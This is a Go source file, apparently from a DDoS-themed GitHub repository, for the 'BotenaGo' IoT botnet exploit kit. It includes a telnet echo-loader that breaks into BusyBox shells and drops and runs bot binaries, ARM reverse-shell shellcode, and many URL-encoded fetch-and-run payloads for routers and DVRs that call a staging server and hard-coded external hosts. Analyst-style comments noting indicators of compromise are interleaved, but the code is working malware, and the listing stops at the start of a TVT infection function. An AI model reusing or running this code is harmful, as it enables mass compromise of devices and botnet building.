R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/BotenaGo - Multi Exploit.go
1
package main
2
3
import (
4
"net"
5
"time"
6
"bufio"
7
"fmt"
8
"os"
9
"sync"
10
"strings"
11
"strconv"
12
"io/ioutil"
13
"math/rand"
14
"encoding/binary"
15
"encoding/base64"
16
)
17
18
/*
19
20
Exploit kit framework 1.0.0.
21
22
Contains:
23
Reverse shell loader (DONE)
24
Telnet loader (arch detect, dir detect, echo load) (DONE)
25
26
Exploits:
27
UCHTTPD (DONE)
28
TVT-4567 (DONE)
29
TVT-WEB (DONE)
30
UNIX CCTV (DONE)
31
FIBERHOME ROUTER (DONE)
32
VIGOR ROUTER (DONE)
33
COMTREND ROUTER (DONE)
34
GPONFIBER ROUTER (DONE)
35
BROADCOM ROUTER (DONE)
36
DVRIP (DONE)
37
LIBDVR (DONE)
38
HONGDIAN ROUTER (DONE)
39
REALTEK MULTI ROUTER (DONE)
40
TENDA ROUTER (DONE)
41
TOTOLINK ROUTER (DONE)
42
ALCATEL NAS (DONE)
43
LILINDVR (DONE)
44
LINKSYS ESERIES (DONE)
45
*/
46
47
// Loader-wide constants. Analyst note: every "selfrep.*" tag below is passed
// as argv[1] to the dropped bot binary (see telnetLoader and the *Payload
// strings), so the tag visible in a process listing or shell history on a
// victim identifies which exploit delivered it.
const (
	// ELF e_ident layout used by telnetExtractArch.
	EI_NIDENT int = 16
	EI_DATA int = 5
	EE_LITTLE int = 1
	EE_BIG int = 2

	// ELF e_machine values, mapped to the dropper architecture names
	// "arm", "mips"/"mpsl", "ppc", "sh4". EM_AARCH64 is defined but not
	// matched anywhere in this listing.
	EM_ARM int = 40
	EM_MIPS int = 8
	EM_AARCH64 int = 183
	EM_PPC int = 20
	EM_PPC64 int = 21
	EM_SH int = 42

	// DVRIP "Ret" status codes; infectFunctionDvrip only tests DVRIP_OK.
	DVRIP_NORESP int = 0
	DVRIP_OK int = 100
	DVRIP_FAILED int = 203
	DVRIP_UPGRADED int = 515

	// Echo loader: bytes per `echo -ne` line, and the file name the dropped
	// stub is expected to leave behind in the working directory
	// (IOC: a file named "qn_local" in /tmp, /var, /mnt, /dev or /var/tmp).
	echoLineLen = 128
	echoDlrOutFile = "qn_local"

	// Per-exploit tags (IOC: argv[1] of the bot process). Note that the
	// TVT web and TVT 4567 paths share the same tag.
	loaderTvtWebTag = "selfrep.tvt"
	loaderTvt4567Tag = "selfrep.tvt"
	loaderVigorTag = "selfrep.vigor"
	loaderComtrendTag = "selfrep.comtrend"
	loaderGponfiberTag = "selfrep.gponfiber"
	loaderFiberhomeTag = "selfrep.fiberhome"
	loaderLibdvrTag = "selfrep.libdvr"
	loaderDvripTag = "selfrep.dvrip"
	loaderUchttpdTag = "selfrep.uchttpd"
	loaderHongdianTag = "selfrep.hongdian"
	loaderTendaTag = "selfrep.tenda"
	loaderTotolinkTag = "selfrep.totolink"
	loaderZyxelTag = "selfrep.zyxel"
	loaderAlcatleTag = "selfrep.alcatel"
	loaderLilinTag = "selfrep.lilin"
	loaderLinksysTag = "selfrep.linksys"
	loaderZteTag = "selfrep.zte"
	loaderNetgearTag = "selfrep.netgear"
	loaderDlinkTag = "selfrep.dlink"

	// Staging server. "1.1.1.1" appears to be a placeholder in this copy;
	// an operator substitutes the real host. Two payloads below
	// (magicPayload, gponOGPayload) hard-code other hosts instead.
	loaderDownloadServer = "1.1.1.1" // Remote IP Of Server With Bins And Sh Files
	loaderBinsLocation = "/a/b/" // Path To Bins
	loaderScriptsLocation = "/a/" // Path To Sh Files (wget.sh)
)
92
93
// elfHeader holds the leading fields of an ELF header as reassembled by
// telnetExtractArch from the bytes of /bin/echo read back over telnet.
// Only e_machine and e_ident[EI_DATA] are consulted.
type elfHeader struct {
	e_ident [EI_NIDENT]int8
	e_type, e_machine int16
	e_version int32
}
98
99
// smapsRegion is one "rwxp" mapping parsed from /proc/<pid>/smaps by
// ucGuessSmaps (the uchttpd path-traversal exploit). region is the start
// address; the remaining fields mirror the kB counters in the smaps entry.
// (The field is spelled shared_ditry in the original; it is part of the
// program and left unchanged here.)
type smapsRegion struct {
	region uint64
	size, pss, rss int
	shared_clean, shared_ditry int
	private_clean, private_dirty int
}
105
106
// echoDropper is one file from ./dlrs/ pre-rendered as `echo -ne` shell
// lines (see telnetLoadDroppers). payload has room for 128 lines of
// echoLineLen bytes each; payload_count is how many are in use.
type echoDropper struct {
	payload [128]string
	payload_count int
}
110
111
// Process-wide loader state. netTimeout is declared as a bare 30 (i.e. a
// time.Duration of 30ns) and is not referenced anywhere in this listing;
// the dial timeouts below are written out as 10 * time.Second instead.
// dropperMap is populated by telnetLoadDroppers and read by
// telnetDropDropper; exploitMap, mode and doExploit are presumably driven
// by main(), which is not part of this listing.
var (
	netTimeout time.Duration = 30
	workerGroup sync.WaitGroup
	magicGroup sync.WaitGroup
	mode, doExploit string
	exploitMap map[string]interface{}
	dropperMap map[string]echoDropper
)
119
120
// counters
121
// Progress counters incremented from the worker goroutines without any
// synchronisation: telShells counts telnet sessions that reached a BusyBox
// shell, payloadSent counts exploit payloads that were delivered.
var telShells, payloadSent int
122
123
// Per-exploit payload strings. Most are one-liners that fetch
// loaderScriptsLocation + "wget.sh" (or a bot binary) from
// loaderDownloadServer, mark it 777, run it with the exploit's tag, and
// delete it. Analyst notes on indicators shared across them:
//   - temp file names written on the victim: "sfs", "s", "splash.sh",
//     "wget.sh", "bot.arm7", all under /tmp;
//   - "${IFS}" (and its URL-encoded form %24%7BIFS%7D) stands in for spaces
//     to get past naive filters, and "+"/%20/%3B encodings vary per target;
//   - two payloads bypass the configured server and hard-code external
//     hosts: magicPayload (rippr.cc) and gponOGPayload (37.0.11.220).
var (
	// uc exploit settings
	// should be reverse shell to same ip as loader on port 31391
	// (ARM Thumb shellcode; the loader's listener port is ucRshellPort).
	uchttpdShellCode string = "\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x11\xa1\x8a\x78\x01\x3a\x8a\x70\x02\x21\x08\x1c\x01\x21\x92\x1a\x0f\x02\x19\x37\x01\xdf\x06\x1c\x0b\xa1\x02\x23\x0b\x80\x10\x22\x02\x37\x01\xdf\x3e\x27\x01\x37\xc8\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x07\xa0\x92\x1a\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x01\x21\x08\x1c\x01\xdf\xc0\x46\xff\xff\x7b\xb4\xb9\x35\x5a\x13\x2f\x62\x69\x6e\x2f\x73\x68\x58\xff\xff\xc0\x46\xef\xbe\xad\xde"
	ucRshellPort int = 31412

	// tvt exploit settings (both write /tmp/sfs; both use the same tag)
	tvtWebPayload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderTvtWebTag
	tvt4567Payload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderTvt4567Tag

	// magic exploit settings: one packet type byte per attempt
	// ('b','i','l','R','D','g','C','M'), tried in order by
	// infectFunctionMagicProto against each port in magicPorts.
	// magicPayload fetches from rippr.cc rather than loaderDownloadServer.
	magicPacketIds []string = []string{"\x62", "\x69", "\x6c", "\x52", "\x44", "\x67", "\x43", "\x4d"}
	magicPorts []int = []int{1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 8001, 8002, 8003, 8004, 8005, 8006, 8007, 8008, 8009, 8010, 8020, 8030, 8040, 8050, 8060, 8070, 8080, 8090, 8100, 8200, 8300, 8400, 8500, 8600, 8700, 8800, 8888, 8900, 8999, 9000, 9090}
	magicPayload string = "wget http://rippr.cc/u -O-|sh;"

	// lilindvr payload (fetches "/l" from the staging server)
	lilinPayload string = "wget -O- http://" + loaderDownloadServer + "/l|sh"

	// fiberhome exploit settings
	fiberRandPort int = 1 // 0 for use below
	fiberStaticPort int = 31784
	fiberSecStrs []string = []string{"0.3123525368318707", "0.13378587435314315", "0.8071510413685209"}

	// vigor exploit settings (URL-encoded; fetches bot.arm7 from
	// loaderBinsLocation rather than a wget.sh script)
	vigorPayload string = "bin%2Fsh%24%7BIFS%7D-c%24%7BIFS%7D%27cd%24%7BIFS%7D%2Ftmp%24%7BIFS%7D%26%26%24%7BIFS%7Dbusybox%24%7BIFS%7Dwget%24%7BIFS%7Dhttp%3A%2F%2F" + loaderDownloadServer + loaderBinsLocation + "bot.arm7%24%7BIFS%7D%26%26%24%7BIFS%7Dchmod%24%7BIFS%7D777%24%7BIFS%7Dbot.arm7%24%7BIFS%7D%26%26%24%7BIFS%7D.%2Fbot.arm7%24%7BIFS%7D" + loaderVigorTag + "%24%7BIFS%7D%26%26%24%7BIFS%7Drm%24%7BIFS%7D-rf%24%7BIFS%7Dbot.arm7"

	// broadcom router settings (command substitution, fetches "/b")
	broadcomPayload string = "$(wget%20http://" + loaderDownloadServer + "/b%20-O-|sh)"

	// hongdian router settings
	hongdianPayload string = "cd+/tmp%3Bbusybox+wget+http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh+-O-+>sfs;chmod+777+sfs%3Bsh+sfs+" + loaderHongdianTag + "%3Brm+-rf+sfs"

	// tenda router settings
	tendaPayload string = "cd%20/tmp%3Brm%20wget.sh%3Bwget%20http%3A//" + loaderDownloadServer + loaderScriptsLocation + "wget.sh%3Bchmod%20777%20wget.sh%3Bsh%20wget.sh%20" + loaderTendaTag

	// totlink router settings (writes splash.sh)
	totolinkPayload string = "wget%20http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%20-O%20-%20%3Esplash.sh%3B%20chmod%20777%20splash.sh%3B%20sh%20splash.sh%20" + loaderTotolinkTag

	// zyxel nas settings (two encodings of the same fetch-and-run)
	zyxelPayload string = "cd%20/tmp;wget%20http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh%20-O-%20>s;chmod%20777%20s;sh%20s%20" + loaderZyxelTag + ";"
	zyxelPayloadTwo string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderZyxelTag + "%3Brm+-rf+wget.sh"

	// alcatel nas settings
	alcatelPayload string = "cd${IFS}/tmp;wget${IFS}http://" + loaderDownloadServer + loaderScriptsLocation + "wget.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}" + loaderAlcatleTag

	// linksys router settings
	linksysPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bsh+wget.sh+" + loaderLinksysTag + "%3Brm+-rf+wget.sh"
	linksysTwoPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderLinksysTag + "%3Brm+-rf+wget.sh"

	// zte router settings (note: carries loaderZyxelTag, not loaderZteTag,
	// so ZTE infections report as "selfrep.zyxel")
	ztePayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderZyxelTag + "%3Brm+-rf+wget.sh"

	// netgear router settings
	netgearPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderNetgearTag + "%3Brm+-rf+wget.sh"

	// gpon router settings (second fetch goes to the hard-coded host
	// 37.0.11.220 regardless of loaderDownloadServer)
	gponOGPayload string = "wget+http%3A%2F%2F" + loaderDownloadServer + "%2Fg+-O-%7Csh%60%3Bwget+http%3A%2F%2F37.0.11.220%2Fg+-O-%7Csh"

	// dlink router settings
	dlinkTwoPayload string = "cd+%2Ftmp%3Bwget+http%3A%2F%2F" + loaderDownloadServer + "%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+" + loaderDlinkTag + "%3Brm+-rf+wget.sh"
	dlinkThreePayload string = "cd /tmp;wget http://" + loaderDownloadServer + "/a/wget.sh;chmod 777 wget.sh;sh wget.sh " + loaderDlinkTag + ";rm -rf wget.sh"
)
185
186
// zeroByte overwrites every element of a with 0. The protocol handlers use
// it to scrub a read buffer between steps. The slice keeps its length, so a
// later string(buf) on it is a run of NUL bytes rather than "".
func zeroByte(a []byte) {

	for i := range a {
		a[i] = 0
	}
}
192
193
// getStringInBetween returns the text of str between the first occurrence
// of start and the first occurrence of end.
//
// Returns "" if start is absent. end is located by searching from the
// beginning of str (not from after start); the result is "null" unless the
// end index lies more than one byte past the end of start. The only caller
// in this listing (the DVRIP "Ret" parser) feeds the result to strconv.Atoi,
// so "null" surfaces there as a parse error.
func getStringInBetween(str string, start string, end string) (result string) {

	s := strings.Index(str, start)
	if s == -1 {
		return
	}

	s += len(start)
	e := strings.Index(str, end)

	if (s > 0 && e > s + 1) {
		return str[s:e]
	} else {
		return "null"
	}
}
209
210
// randStr returns strlen pseudo-random ASCII letters (A-Z, a-z). It reseeds
// math/rand from the wall clock on every call. The loader uses the output
// for throwaway file names on the victim and for the bogus
// "/bin/busybox <name>" probe whose ": applet not found" reply acts as an
// end-of-command marker throughout the telnet module.
func randStr(strlen int) (string) {

	var b strings.Builder

	rand.Seed(time.Now().UnixNano())
	chars := []rune("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")

	for i := 0; i < strlen; i++ {
		b.WriteRune(chars[rand.Intn(len(chars))])
	}

	return b.String()
}
223
224
// hexToInt parses a hexadecimal string, with or without a "0x" prefix, as a
// uint64. The parse error is discarded, so malformed input yields 0. Used
// on the address column of /proc/<pid>/smaps lines in ucGuessSmaps.
func hexToInt(hexStr string) (uint64) {
	cleaned := strings.Replace(hexStr, "0x", "", -1)
	result, _ := strconv.ParseUint(cleaned, 16, 64)
	return uint64(result)
}
229
230
/* TELNET LOADER MODULE */
231
232
// telnetLoadDroppers reads every file under ./dlrs/ on the loader host and
// pre-renders each as a list of `echo -ne "\x.."` shell lines, one per
// echoLineLen-byte chunk, stored in dropperMap under the file's name. The
// first line redirects with ">" (create), later lines with ">>" (append);
// the destination file name is appended by telnetDropDropper, which also
// expects the file names to be of the form "<name>.<arch>". Exits the
// process if dlrs/ cannot be listed.
//
// Analyst note: this is the Mirai-style "echo loader". On the wire it shows
// up as long telnet lines of the form
//   echo -ne "\x7f\x45\x4c\x46..." > <5 letters>; /bin/busybox <5 letters>
// which is a reliable network signature for this family.
func telnetLoadDroppers() {

	files, err := ioutil.ReadDir("dlrs")
	if err != nil {
		fmt.Printf("\033[1;31mError: Failed to open dlrs/\r\n")
		os.Exit(0)
	}

	for i := 0; i < len(files); i++ {
		file, err := os.OpenFile("dlrs/" + files[i].Name(), os.O_RDONLY, 0755)
		if err != nil {
			continue
		}

		mapVal := echoDropper{}
		mapVal.payload_count = 0

		for {
			var echoString string
			dataBuf := make([]byte, echoLineLen)

			length, err := file.Read(dataBuf)
			if err != nil || length <= 0 {
				break
			}

			// Hex-escape each byte of the chunk for `echo -ne`.
			for i := 0; i < length; i++ {
				echoByte := fmt.Sprintf("\\x%02x", uint8(dataBuf[i]))
				echoString += echoByte
			}

			if mapVal.payload_count == 0 {
				mapVal.payload[mapVal.payload_count] = fmt.Sprintf("echo -ne \"%s\" > ", echoString)
			} else {
				mapVal.payload[mapVal.payload_count] = fmt.Sprintf("echo -ne \"%s\" >> ", echoString)
			}

			mapVal.payload_count++
		}

		dropperMap[files[i].Name()] = mapVal
		file.Close()
	}

	fmt.Printf("\x1b[38;5;46mLoader\x1b[38;5;15m: \x1b[38;5;15mLoaded \x1b[38;5;134m%d\x1b[38;5;15m echo droppers\x1b[38;5;15m\x1b[38;5;15m\r\n", len(dropperMap))
}
278
279
// telnetHasPrompt is the loader's heuristic for "we are at a shell": it
// reports true if buffer contains any of '#', '>', '$', '%' or '@'. Any of
// these characters in a login banner will also satisfy it.
func telnetHasPrompt(buffer string) (bool) {

	if strings.Contains(buffer, "#") || strings.Contains(buffer, ">") || strings.Contains(buffer, "$") || strings.Contains(buffer, "%") || strings.Contains(buffer, "@") {
		return true
	} else {
		return false
	}
}
287
288
// telnetBusyboxShell blindly sends a fixed series of vendor CLI escape
// commands meant to drop from a restricted menu into /bin/sh. Nothing is
// read back; whether a shell was reached is determined afterwards by
// telnetHasBusybox.
//
// Analyst note: the exact sequence "sh", "..", "linuxshell", "enable",
// "development", "system", "sh", "shell", "ping ; sh" appearing back to
// back in a telnet capture is a strong indicator of this loader.
func telnetBusyboxShell(conn net.Conn) {

	/* Looks wierd but dw its for some BCM router */
	conn.Write([]byte("sh\r\n"))
	conn.Write([]byte("..\r\n"))
	conn.Write([]byte("linuxshell\r\n"))
	/* ------------------------------------------ */

	conn.Write([]byte("enable\r\n"))
	conn.Write([]byte("development\r\n"))
	conn.Write([]byte("system\r\n"))
	conn.Write([]byte("sh\r\n"))
	conn.Write([]byte("shell\r\n"))
	conn.Write([]byte("ping ; sh\r\n"))
}
303
304
// telnetDropDropper writes the pre-rendered dropper for myarch onto the
// victim through an already-established shell on conn, then runs and
// deletes it. It picks the first dropperMap entry whose file name has the
// form "<name>.<myarch>", writes it line by line with `echo -ne`, and
// after each line sends "/bin/busybox <query>" and waits for the
// ": applet not found" reply as a synchronisation marker. Returns true
// once the final "chmod 777 X; ./X; rm -rf X" line has been acknowledged
// the same way, false on any read failure or missing marker.
//
// The dropped stub is named with 5 random letters and removed immediately;
// callers then expect echoDlrOutFile ("qn_local") to exist (see
// telnetLoader), so presumably the stub fetches the real bot into that
// file — the listing does not show the stub itself.
func telnetDropDropper(conn net.Conn, myarch string) (bool) {

	for arch, mapval := range dropperMap {
		splitVal := strings.Split(arch, ".")
		if len(splitVal) != 2 {
			continue
		}

		if splitVal[1] == myarch {
			query := randStr(5)
			dropper := randStr(5)
			droppedLines := 0

			for i := 0; i < mapval.payload_count; i++ {
				var rdbuf []byte = []byte("")
				complete := 0

				conn.Write([]byte(mapval.payload[i] + dropper + "; /bin/busybox " + query + "\r\n"))

				// Wait for the bogus applet's error as an end-of-line ack.
				for {
					tmpbuf := make([]byte, 128)
					ln, err := conn.Read(tmpbuf)
					if ln <= 0 || err != nil {
						break
					}

					rdbuf = append(rdbuf, tmpbuf...)
					if strings.Contains(string(rdbuf), ": applet not found") {
						complete = 1
						break
					}
				}

				if complete == 0 {
					return false
				}

				droppedLines++
			}

			if droppedLines == mapval.payload_count {
				var rdbuf []byte = []byte("")

				conn.Write([]byte("chmod 777 " + dropper + "; ./" + dropper + "; rm -rf " + dropper + "; /bin/busybox " + query + "\r\n"))

				for {
					tmpbuf := make([]byte, 128)
					ln, err := conn.Read(tmpbuf)
					if ln <= 0 || err != nil {
						break
					}

					rdbuf = append(rdbuf, tmpbuf...)
					if strings.Contains(string(rdbuf), ": applet not found") {
						return true
					}
				}

				return false
			} else {
				return false
			}
		} else {
			continue
		}
	}

	return false
}
373
374
// telnetHasBusybox sends "/bin/busybox <random>" and reads until the
// ": applet not found" error arrives. Returns (true, version) where
// version is the token following "BusyBox v" in the reply, or "unknown" if
// no banner was seen; returns (false, "unknown") if the connection ends
// without the marker.
func telnetHasBusybox(conn net.Conn) (bool, string) {

	var rdbuf []byte = []byte("")

	query := randStr(6)
	resp := ": applet not found"

	conn.Write([]byte("/bin/busybox " + query + "\r\n"))
	for {
		tmpbuf := make([]byte, 128)
		ln, err := conn.Read(tmpbuf)
		if ln <= 0 || err != nil {
			break
		}

		rdbuf = append(rdbuf, tmpbuf...)
		if strings.Contains(string(rdbuf), resp) == true {
			index := strings.Index(string(rdbuf), "BusyBox v")
			if index == -1 {
				return true, "unknown"
			} else {
				// Version string runs from after "BusyBox v" to the next space.
				verstr := strings.Split(string(rdbuf)[len("BusyBox v")+index:], " ")
				if len(verstr) > 0 {
					return true, verstr[0]
				} else {
					return true, "unknown"
				}

			}
		}
	}

	return false, "unknown"
}
408
409
// telnetWritableDir tries, in order, /tmp/, /var/tmp/, /var/, /mnt/, /etc/,
// / and /dev/, sending "cd <dir> && echo <random>" and returning the first
// directory whose echo token comes back. Despite the name it only verifies
// that cd succeeds — writability is not tested. Returns (false, "none") if
// none of the directories answer. The shell is left cd'ed into the
// directory returned.
func telnetWritableDir(conn net.Conn) (bool, string) {

	var rdbuf []byte
	dirs := []string{"/tmp/", "/var/tmp/", "/var/", "/mnt/", "/etc/", "/", "/dev/"}

	for i := 0; i < len(dirs); i++ {
		echoStr := randStr(4)
		conn.Write([]byte("cd " + dirs[i] + " && echo " + echoStr + "\r\n"))

		for {
			tmpbuf := make([]byte, 128)
			ln, err := conn.Read(tmpbuf)
			if ln <= 0 || err != nil {
				break
			}

			rdbuf = append(rdbuf, tmpbuf...)
			if strings.Contains(string(rdbuf), "can't cd") || strings.Contains(string(rdbuf), "No such file or") {
				break
			} else if strings.Contains(string(rdbuf), echoStr) {
				return true, dirs[i]
			}
		}

		zeroByte(rdbuf)
	}

	return false, "none"
}
438
439
// telnetExtractArch fingerprints the victim's CPU by sending
// "/bin/busybox cat /bin/echo", locating "ELF" in the reply, and decoding
// e_machine (and, for MIPS, the endianness byte e_ident[EI_DATA]) from the
// bytes that follow. Returns (true, name) for name in "arm", "mpsl",
// "mips", "ppc", "sh4"; (false, "none") if no ELF header was seen;
// (false, "") for an unrecognised machine type.
//
// Not called from any function in this listing — telnetLoader receives the
// architecture from its caller instead.
func telnetExtractArch(conn net.Conn) (bool, string) {

	var rdbuf []byte
	var index int = -1

	conn.Write([]byte("/bin/busybox cat /bin/echo\r\n"))

	for {
		tmpbuf := make([]byte, 128)
		ln, err := conn.Read(tmpbuf)
		if ln <= 0 || err != nil {
			break
		}

		rdbuf = append(rdbuf, tmpbuf...)
		index = strings.Index(string(rdbuf), "ELF")

		if index != -1 {
			// One more read so the header fields after the magic are present.
			zeroByte(tmpbuf)
			ln, err := conn.Read(tmpbuf)

			if ln <= 0 || err != nil {
				break
			}

			rdbuf = append(rdbuf, tmpbuf...)
			break
		}
	}

	if index == -1 {
		return false, "none"
	}

	rdbuf = rdbuf[index:]
	elfHdr := elfHeader{}

	for i := 0; i < EI_NIDENT; i++ {
		elfHdr.e_ident[i] = int8(rdbuf[i])
	}

	elfHdr.e_type = int16(rdbuf[EI_NIDENT])
	elfHdr.e_machine = int16(rdbuf[EI_NIDENT + 2])
	elfHdr.e_version = int32(rdbuf[EI_NIDENT + 2 + 2])

	if elfHdr.e_machine == int16(EM_ARM) {
		return true, "arm"
	} else if elfHdr.e_machine == int16(EM_MIPS) {
		if elfHdr.e_ident[EI_DATA] == int8(EE_LITTLE) {
			return true, "mpsl"
		} else {
			return true, "mips"
		}
	} else if elfHdr.e_machine == int16(EM_PPC) || elfHdr.e_machine == int16(EM_PPC64) {
		return true, "ppc"
	} else if elfHdr.e_machine == int16(EM_SH) {
		return true, "sh4"
	}

	return false, ""
}
500
501
// telnetLoader drives a full infection over a raw TCP connection to target
// ("host:port") that is expected to already present a shell (the libdvr
// and dvrip paths open a telnetd on the victim first). Steps, in order:
//   1. with dologin == 0, read until telnetHasPrompt sees a prompt
//      character; any other dologin value leaves loggedIn at 0 and the
//      function returns without doing anything further;
//   2. telnetBusyboxShell escape sequence, then telnetHasBusybox;
//   3. telnetWritableDir to pick a working directory;
//   4. telnetDropDropper for arch;
//   5. "/bin/busybox cat qn_local > <6 letters>; chmod 777 ...; ./<6 letters> <tag>",
//      sleep 5s, close.
// Increments telShells once a BusyBox shell is confirmed. Status lines are
// printed to stdout in ANSI colour.
//
// Analyst note: the step-5 command line, with its random 6-letter binary
// name and a "selfrep.*" tag, is what ends up in shell history / process
// listings on a compromised device.
func telnetLoader(target string, dologin int, arch string, tag string) {

	var (
		rdbuf []byte = []byte("")
		loggedIn int = 0
	)

	conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
	if err != nil {
		return
	}

	if dologin == 0 {
		for {
			tmpbuf := make([]byte, 128)
			ln, err := conn.Read(tmpbuf)
			if ln <= 0 || err != nil {
				break
			}

			rdbuf = append(rdbuf, tmpbuf...)
			if telnetHasPrompt(string(rdbuf)) == true {
				loggedIn = 1
				break
			}
		}
	}

	zeroByte(rdbuf)
	if loggedIn == 0 {
		conn.Close()
		return
	}

	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m shell found on device\x1b[38;5;15m\x1b[38;5;15m\r\n", target)
	telnetBusyboxShell(conn)

	has, ver := telnetHasBusybox(conn)
	if has == false {
		conn.Close()
		return
	}

	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m device is running busybox version \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver)
	telShells++

	has, dir := telnetWritableDir(conn)
	if has == false {
		conn.Close()
		return
	}

	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s\x1b[38;5;15m found writable directory \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver, dir)

	// Second busybox probe: re-synchronises the stream after the cd.
	has, _ = telnetHasBusybox(conn)
	if has == false {
		conn.Close()
		return
	}

	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s:%s\x1b[38;5;15m extracted arch \x1b[38;5;134m%s\x1b[38;5;15m\r\n", target, ver, dir, arch)

	dropped := telnetDropDropper(conn, arch)
	if dropped == false {
		conn.Close()
		return
	}

	fmt.Printf("\x1b[38;5;46mTelnet\x1b[38;5;15m: \x1b[38;5;134m%s:v%s:%s:%s\x1b[38;5;15m finnished echo loading\x1b[38;5;15m\r\n", target, ver, dir, arch)

	binName := randStr(6)
	conn.Write([]byte("/bin/busybox cat " + echoDlrOutFile + " > " + binName + "; chmod 777 " + binName + "; ./" + binName + " " + tag + "\r\n"))
	// Done? (no acknowledgement is read; the sleep is the only wait)
	time.Sleep(5 * time.Second)
	conn.Close()
	return
}
578
579
/* ------ END OF TELNET LOADER ------- */
580
581
/* ------ OTHER PROTOCOL STUFF ------- */
582
583
// reverseShellUchttpdLoader is the post-exploitation handler for an inbound
// reverse shell from the uchttpd shellcode (conn is the accepted
// connection; the listener itself is not in this listing). It probes for a
// writable directory by creating a ".h" file in /tmp, /mnt, /var, /dev and
// /var/tmp, syncs on a bogus busybox applet, drops the "arm7" dropper via
// telnetDropDropper, runs "qn_local" under a random 6-letter name with
// loaderUchttpdTag, and finally restarts "/var/Sofia" in the background.
// Increments payloadSent on success. The connection is closed on failure
// but deliberately left open on success.
//
// Analyst note: empty ".h" files in those directories and a respawned
// /var/Sofia process are on-host artefacts of this path.
func reverseShellUchttpdLoader(conn net.Conn) {

	var (
		rdbuf []byte = []byte("")
		query string = randStr(5)
	)

	conn.Write([]byte(">/tmp/.h && cd /tmp/\r\n"))
	conn.Write([]byte(">/mnt/.h && cd /mnt/\r\n"))
	conn.Write([]byte(">/var/.h && cd /var/\r\n"))
	conn.Write([]byte(">/dev/.h && cd /dev/\r\n"))
	conn.Write([]byte(">/var/tmp/.h && cd /var/tmp/\r\n"))
	conn.Write([]byte("/bin/busybox " + query + "\r\n"))

	for {
		tmpbuf := make([]byte, 128)
		ln, err := conn.Read(tmpbuf)
		if ln <= 0 || err != nil {
			conn.Close()
			return
		}

		rdbuf = append(rdbuf, tmpbuf...)
		if strings.Contains(string(rdbuf), ": applet not found") {
			break
		}
	}

	zeroByte(rdbuf)

	dropped := telnetDropDropper(conn, "arm7")
	if dropped == false {
		conn.Close()
		return
	}

	fmt.Printf("\x1b[38;5;46mUchttpd\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", conn.RemoteAddr())
	payloadSent++
	binName := randStr(6)
	conn.Write([]byte("/bin/busybox cat " + echoDlrOutFile + " > " + binName + "; chmod 777 " + binName + "; ./" + binName + " " + loaderUchttpdTag + ";\r\n"))
	conn.Write([]byte("/var/Sofia 2>/dev/null &\r\n"))
	return
}
626
627
func infectFunctionTvt4567(conn net.Conn) {
628
629
var (
630
rdbuf []byte = []byte("")
631
state = 0
632
)
633
634
